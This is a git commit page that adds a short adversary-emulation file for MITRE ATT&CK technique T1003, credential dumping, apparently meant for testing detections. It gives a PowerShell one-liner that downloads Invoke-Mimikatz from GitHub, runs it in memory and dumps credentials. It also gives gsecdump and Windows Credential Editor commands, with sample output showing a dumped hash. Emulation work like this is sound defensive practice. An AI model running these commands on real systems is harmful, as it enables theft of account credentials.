Initial Commit
Initial Checkin
This commit is contained in:
caseysmithrc
@@ -0,0 +1,36 @@
|
||||
# Credential Dumping
|
||||
|
||||
MITRE ATT&CK Technique: [T1003](https://attack.mitre.org/wiki/Technique/T1003)
|
||||
|
||||
|
||||
## Powershell Mimikatz
|
||||
|
||||
Input:
|
||||
|
||||
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
|
||||
|
||||
## Gsecdump
|
||||
|
||||
[Gsecdump](https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5)
|
||||
|
||||
Input:
|
||||
|
||||
gsecdump -a
|
||||
|
||||
## Windows Credential Editor
|
||||
|
||||
[Windows Credential Editor](http://www.ampliasecurity.com/research/windows-credentials-editor/)
|
||||
|
||||
Input:
|
||||
|
||||
wce -o output.txt
|
||||
|
||||
Output:
|
||||
|
||||
C:\>wce -o output.txt
|
||||
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
|
||||
Use -h for help.
|
||||
|
||||
C:\>type output.txt
|
||||
test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102
|
||||
C:\>
|
||||
Reference in New Issue
Block a user